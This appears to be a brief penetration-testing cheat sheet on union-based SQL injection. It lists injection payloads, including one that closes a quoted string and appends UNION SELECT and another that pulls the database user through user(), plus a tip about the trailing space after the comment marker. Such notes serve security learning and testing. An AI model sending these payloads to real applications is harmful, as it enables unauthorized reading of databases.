Union Injection

Using UNION

abc' # any string not listed
UNION 
select 1,2,3-- 

space after --

cn' UNION select 1,user(),3,4-- 

Last updated